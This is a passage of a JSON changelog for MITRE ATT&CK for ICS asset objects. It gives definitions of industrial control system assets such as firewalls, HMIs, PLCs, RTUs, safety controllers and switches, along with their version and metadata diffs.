                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "1.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\", \"root['x_mitre_sectors']\": [\"General\"]}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28T17:57:22.946Z\", \"old_value\": \"2023-09-28 17:57:22.946000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-27T16:50:21.228Z\", \"old_value\": \"2023-10-04 19:26:49.788000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--bb141168-ae41-4974-8ece-dc9b63e59237",
                    "created": "2025-09-24T18:17:26.575Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0016",
                            "external_id": "A0016"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-27T18:02:22.344Z",
                    "name": "Firewall",
                    "description": "A gateway that limits access between networks in accordance with local security policy.\n\nIn ICS networks, firewalls can exist in multiple locations in the network architecture and  serve a variety of purposes. The first, and often the most important, is the firewall segmenting the ICS network from the business network. This firewall acts as the primary network boundary point that controls the ingress/egress of network traffic between the ICS and business networks. This firewall may also be a single device connected to multiple network segments, where the firewall defines individual zones for the different network segments and can control access to the zones and between the zones. This can limit the ability of an adversary to traverse a network.\n",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "Boundary Firewall",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "A boundary firewall is used to control the flow of traffic between two different networks. It is typically used to delineate the different levels of the Purdue Model. "
                        },
                        {
                            "name": "Device Firewall",
                            "description": "A device firewall is used to control the flow of traffic between a network and an individual device. It is used when additional protections are required beyond that of a boundary firewall. For example, a boundary firewall may limit traffic on the network to two protocols, but, a device firewall may further limit traffic to a particular device on that network to a single protocol."
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Embedded",
                        "Windows",
                        "Linux",
                        "Network"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "1.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"dictionary_item_removed\": {\"root['x_mitre_related_assets'][1]['related_asset_sectors']\": []}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-09-24T18:17:26.575Z\", \"old_value\": \"2025-09-24 18:17:26.575000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-27T18:02:22.344Z\", \"old_value\": \"2025-10-21 19:34:14.912000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64",
                    "created": "2023-09-28T14:38:54.407Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0002",
                            "external_id": "A0002"
                        },
                        {
                            "source_name": "IEC February 2019",
                            "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ",
                            "url": "https://webstore.iec.ch/publication/34421"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-23T00:58:37.171Z",
                    "name": "Human-Machine Interface (HMI)",
                    "description": "Human-Machine Interfaces (HMIs) are systems used by an operator to monitor the real-time status of an operational process and to perform necessary control functions, including the adjustment of device parameters. An HMI can take various forms, including a dedicated screen or control panel integrated with a specific device/controller, or a customizable software GUI application running on a standard operating system (e.g., MS Windows) that interfaces with a control/SCADA server. The HMI is critical to ensuring operators have sufficient visibility and control over the operational process.",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "Operator Workstation (OWS)",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "An Operator Workstation (OWS) or Console is a system or device used by an operator to interface with a control system, including to access/visualizes key information or parameters about the operational process and initiate control actions. This typically consists of specialized OWS software installed on a Workstation platform. (Citation: IEC February 2019)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Windows"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "1.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28T14:38:54.407Z\", \"old_value\": \"2023-09-28 14:38:54.407000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-23T00:58:37.171Z\", \"old_value\": \"2023-10-04 17:59:11.489000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04",
                    "created": "2023-09-28T14:46:42.566Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0005",
                            "external_id": "A0005"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-27T16:47:33.077Z",
                    "name": "Intelligent Electronic Device (IED)",
                    "description": "An Intelligent Electronic Device (IED) is a type of specialized field device that is designed to perform specific operational functions, frequently for protection, monitoring, or control within the electric sector. IEDs are typically used to both acquire telemetry and execute tailored control algorithms/actions based on customizable parameters/settings. An IED is usually implemented as a dedicated embedded device and supports various network automation protocols to communicate with RTUs and Control Servers.",
                    "x_mitre_sectors": [
                        "Electric"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "Protection Relay",
                            "related_asset_sectors": [
                                "Electric"
                            ],
                            "description": "A protection relay is a type of IED used within the electric sector to monitor for faults or problematic operating conditions on power lines, busses, or transformers. While traditionally protection relays were electromechanical or electromagnetic devices, modern relays utilize microprocessors, embedded operating system, and SCADA communications."
                        },
                        {
                            "name": "Field Device / Controller",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "IEDs may be referred to as Field Controllers or Field Devices as a general function name. "
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Embedded"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "1.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28T14:46:42.566Z\", \"old_value\": \"2023-09-28 14:46:42.566000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-27T16:47:33.077Z\", \"old_value\": \"2023-10-04 18:01:02.506000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_related_assets'][1]['related_asset_sectors'][0]\": \"General\"}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787",
                    "created": "2023-09-28T17:52:53.206Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0012",
                            "external_id": "A0012"
                        },
                        {
                            "source_name": "North American Electric Reliability Corporation June 2021",
                            "description": "North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ",
                            "url": "https://www.nerc.com/pa/Stand/Glossary%20of%20Terms/Glossary_of_Terms.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-23T00:58:05.830Z",
                    "name": "Jump Host",
                    "description": "Jump hosts are devices used to support remote management sessions into ICS networks or devices. The system is used to access the ICS environment securely from external networks, such as the corporate network. The user must first remote into the jump host before they can access ICS devices. The jump host may be a customized Windows server using common remote access protocols (e.g., RDP) or a dedicated access management device. The jump host typically performs various security functions to ensure the authenticity of remote sessions, including authentication, enforcing access controls/permissions, and auditing all access attempts.  ",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "Intermediate System",
                            "related_asset_sectors": [
                                "Electric"
                            ],
                            "description": "A Cyber Asset or collection of Cyber Assets performing access control to restrict Interactive Remote Access to only authorized users.(Citation: North American Electric Reliability Corporation June 2021)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Embedded",
                        "Linux",
                        "Windows"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "1.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28T17:52:53.206Z\", \"old_value\": \"2023-09-28 17:52:53.206000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-23T00:58:05.830Z\", \"old_value\": \"2023-10-04 18:03:06.811000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--459e4335-74e1-4136-b730-0f116f0d541d",
                    "created": "2025-09-29T18:56:19.712Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0018",
                            "external_id": "A0018"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-27T16:50:01.628Z",
                    "name": "Programmable Automation Controller (PAC)",
                    "description": "A Programmable Automation Controller (PAC) is an embedded programmable control device. PACs are designed to enable automation applications across integrated software applications, peer controllers (e.g., PLC), Human Machine Interfaces, and other systems. PACs often include advanced features for process control, motion control, drive control, and vision applications. PACs are programmed using traditional process automation programming languages (IEC-61131) and sometimes languages such as C and C++ to support more advanced controls.",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "Field Device / Controller",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Programmable Automation Controller (PAC) may be referred to as Field Controllers or Field Devices as a general function name."
                        },
                        {
                            "name": "Programmable Logic Controller (PLC)",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Programmable Logic Controllers (PLC) share some of the same functionality as PACs, although often without more advanced control features. Historically, differences between PLCs and PACs were minimal, resulting in varying use of the terms across industry. "
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Embedded"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "1.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\", \"root['x_mitre_sectors']\": [\"General\"]}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-09-29T18:56:19.712Z\", \"old_value\": \"2025-09-29 18:56:19.712000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-27T16:50:01.628Z\", \"old_value\": \"2025-10-03 17:46:10.281000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990",
                    "created": "2023-09-28T14:43:05.105Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0003",
                            "external_id": "A0003"
                        },
                        {
                            "source_name": "IEC February 2013",
                            "description": "IEC 2013, February 20 IEC 61131-3:2013  Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ",
                            "url": "https://webstore.iec.ch/publication/4552"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-27T16:47:46.663Z",
                    "name": "Programmable Logic Controller (PLC)",
                    "description": "A Programmable Logic Controller (PLC) is an embedded programmable control device. PLCs typically utilize a modular architecture with separate modules used to support its processing capabilities, communication mediums, and I/O interfaces. PLCs allow for the deployment of customized programs/logic to control or monitor an operational process. This logic is defined using industry specific programming languages, such as IEC 61131 (Citation: IEC February 2013), which define the set of tasks and program organizational units (POUs) included in the device\u2019s programs.  PLCs also typically have distinct operating modes (e.g., Remote, Run, Program, Stop) which are used to determine when the device can be programmed or whether it should execute the custom logic.",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "Process Automation Controller  (PAC)",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Process Automation Controllers (PAC) share much of the same functionality as a PLC. PACs may include advanced features for process control, motion control, drive control, and vision applications. PACs may include additional features such as options to program in traditional programming languages such as C and C++ in addition to 61131 programming languages in order to support these more advanced controls.  "
                        },
                        {
                            "name": "Field Device / Controller",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Programmable Logic Controller (PLC) may be referred to as Field Controllers or Field Devices as a general function name.   "
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Embedded"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "1.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28T14:43:05.105Z\", \"old_value\": \"2023-09-28 14:43:05.105000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-27T16:47:46.663Z\", \"old_value\": \"2023-10-04 18:09:21.296000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_related_assets'][1]['related_asset_sectors'][0]\": \"General\"}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32",
                    "created": "2023-09-28T14:44:54.756Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0004",
                            "external_id": "A0004"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-23T00:58:18.239Z",
                    "name": "Remote Terminal Unit (RTU)",
                    "description": "A Remote Terminal Unit (RTU) is a device that typically resides between field devices (e.g., PLCs, IEDs) and control/SCADA servers and supports various communication interfacing and data aggregation functions. RTUs are typically responsible for forwarding commands from the control server and the collection of telemetry, events, and alerts from the field devices. An RTU can be implemented as a dedicated embedded device, as software platform that runs on a hardened/ruggedized computer, or using a custom application program on a PLC.",
                    "x_mitre_sectors": [
                        "Electric",
                        "General",
                        "Water and Wastewater"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Embedded",
                        "Linux",
                        "Windows"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "1.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28T14:44:54.756Z\", \"old_value\": \"2023-09-28 14:44:54.756000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-23T00:58:18.239Z\", \"old_value\": \"2023-10-04 18:05:43.237000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5",
                    "created": "2023-09-29T18:55:09.319Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0014",
                            "external_id": "A0014"
                        },
                        {
                            "source_name": "IETF RFC4949 2007",
                            "description": "Internet Engineering Task Force. (2007, August). Internet Security Glossary, Version 2. Retrieved September 29, 2023.",
                            "url": "https://www.ietf.org/rfc/rfc4949.txt"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-27T17:45:55.901Z",
                    "name": "Routers",
                    "description": "A computer that is a gateway between two networks at OSI layer 3 and that relays and directs data packets through that inter-network. The most common form of router operates on IP packets.(Citation: IETF RFC4949 2007)",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Embedded",
                        "Network"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "2.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-29T18:55:09.319Z\", \"old_value\": \"2023-09-29 18:55:09.319000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-27T17:45:55.901Z\", \"old_value\": \"2025-10-21 19:56:56.316000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32",
                    "created": "2023-09-28T15:10:05.534Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0010",
                            "external_id": "A0010"
                        },
                        {
                            "source_name": "Guidance - NIST SP800-82",
                            "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.",
                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"
                        },
                        {
                            "source_name": "SIGTTO ESD 2021",
                            "description": "Society of International Gas Tanker & Terminal Operators Ltd. (2021). ESD Systems: Recommendations for Emergency Shutdown and Related Safety Systems (Second Edition). Retrieved September 28, 2023.",
                            "url": "https://sigtto.org/media/3457/sigtto-2021-esd-systems.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-27T17:25:50.475Z",
                    "name": "Safety Controller",
                    "description": "Safety controllers are typically a type of field device used to perform the safety critical function. Safety controllers often support the deployment of custom programs/logic, similar to a PLC, but can also be tailored for sector specific functions/applications. The safety controllers typically utilize redundant hardware and processors to ensure they operate reliably if a component fails.",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "Safety Instrumented System (SIS) controller",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "SIS controllers are used to \u201ctake the process to a safe state when predetermined conditions are violated\u201d (Citation: Guidance - NIST SP800-82) through the reading of sensor data and interaction with digital/physical control surfaces. These devices are oftentimes located on programmable embedded devices running specialized RTOS or other embedded operating systems. "
                        },
                        {
                            "name": "Emergency Shutdown Systems (ESD) controller",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Emergency Shutdown System controllers are used to read sensor values and interact with control surfaces to return the system \u201cto a safe static condition so that any remedial action can be taken\u201d. (Citation: SIGTTO ESD 2021)"
                        },
                        {
                            "name": "Burner Management Systems (BMS) controller",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "Burner Management System controllers are used to interact with sensors and control surfaces to maintain safe operating conditions for the burner. These can include safely starting-up and managing the main flame, controlling and monitoring the burning conditions, and safely initiating planned or unplanned shutdown sequences."
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Embedded"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "1.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\", \"root['x_mitre_sectors']\": [\"General\"]}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28T15:10:05.534Z\", \"old_value\": \"2023-09-28 15:10:05.534000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-27T17:25:50.475Z\", \"old_value\": \"2023-10-16 18:49:08.504000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_related_assets'][0]\": {\"new_value\": {\"name\": \"Safety Instrumented System (SIS) controller\", \"related_asset_sectors\": [\"General\"], \"description\": \"SIS controllers are used to \\u201ctake the process to a safe state when predetermined conditions are violated\\u201d (Citation: Guidance - NIST SP800-82) through the reading of sensor data and interaction with digital/physical control surfaces. These devices are oftentimes located on programmable embedded devices running specialized RTOS or other embedded operating systems. \"}, \"old_value\": {\"name\": \"Safety Instrumented System (SIS) controller\", \"related_asset_sectors\": [], \"description\": \"SIS controllers are used to \\u201ctake the process to a safe state when predetermined conditions are violated\\u201d (Citation: Guidance - NIST SP800-82) through the reading of sensor data and interaction with digital/physical control surfaces. These devices are oftentimes located on programmable embedded devices running specialized RTOS or other embedded operating systems. \"}}, \"root['x_mitre_related_assets'][1]\": {\"new_value\": {\"name\": \"Emergency Shutdown Systems (ESD) controller\", \"related_asset_sectors\": [\"General\"], \"description\": \"Emergency Shutdown System controllers are used to read sensor values and interact with control surfaces to return the system \\u201cto a safe static condition so that any remedial action can be taken\\u201d. (Citation: SIGTTO ESD 2021)\"}, \"old_value\": {\"name\": \"Emergency Shutdown Systems (ESD) controller\", \"related_asset_sectors\": [], \"description\": \"Emergency Shutdown System controllers are used to read sensor values and interact with control surfaces to return the system \\u201cto a safe static condition so that any remedial action can be taken\\u201d. (Citation: SIGTTO ESD 2021)\"}}, \"root['x_mitre_related_assets'][2]\": {\"new_value\": {\"name\": \"Burner Management Systems (BMS) controller\", \"related_asset_sectors\": [\"General\"], \"description\": \"Burner Management System controllers are used to interact with sensors and control surfaces to maintain safe operating conditions for the burner. These can include safely starting-up and managing the main flame, controlling and monitoring the burning conditions, and safely initiating planned or unplanned shutdown sequences.\"}, \"old_value\": {\"name\": \"Burner Management Systems (BMS) controller\", \"related_asset_sectors\": [], \"description\": \"Burner Management System controllers are used to interact with sensors and control surfaces to maintain safe operating conditions for the burner. These can include safely starting-up and managing the main flame, controlling and monitoring the burning conditions, and safely initiating planned or unplanned shutdown sequences.\"}}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
                    "id": "x-mitre-asset--bb553fda-8355-40bc-87c6-5ae25124fa95",
                    "created": "2025-09-24T17:53:28.482Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/assets/A0015",
                            "external_id": "A0015"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-27T18:01:55.383Z",
                    "name": "Switch",
                    "description": "A switch is a network device that connects endpoints (e.g., workstations, servers, HMIs, PLCs, etc.) so that they can communicate and share data and resources. Switches may operate at either Layer 2 or Layer 3 of the OSI Model and intelligently forward packets across the network based on the specified address (Media Access Control (MAC) address for Layer 2 and Internet Protocol (IP) address for Layer 3). Switches are typically used to define network segments and connect the devices within a particular level of the Purdue Model.  ",
                    "x_mitre_sectors": [
                        "General"
                    ],
                    "x_mitre_related_assets": [
                        {
                            "name": "Core Switch",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "A core switch is a device that provides high-speed and reliable connectivity and can be connected with other core switches to make up the backbone of large enterprise/ICS networks. "
                        },
                        {
                            "name": "Access Switch",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "An access switch is a device that allows end users via endpoints (e.g., workstations, servers, etc.) to connect to the network and share data and resources."
                        },
                        {
                            "name": "Layer 2 Switch",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "A Layer 2 switch is a device that forwards data packets on the network based on the specified destination MAC address."
                        },
                        {
                            "name": "Layer 3 Switch",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "A Layer 3 switch is a device that forwards data packets on the network based on the specified source and destination IP addresses."
                        },
                        {
                            "name": "Distribution Switch",
                            "related_asset_sectors": [
                                "General"
                            ],
                            "description": "A distribution switch is a device that connects access switches with core switches and is responsible for controlling traffic between networks."
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Embedded",
                        "Network"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_version": "1.1",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-09-24T17:53:28.482Z\", \"old_value\": \"2025-09-24 17:53:28.482000+00:00\"}, \"root['modified']\": {\"new_value\": \"2026-04-27T18:01:55.383Z\", \"old_value\": \"2025-10-21 19:34:42.547000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "x-mitre-asset",
                    "spec_version": "2.1",
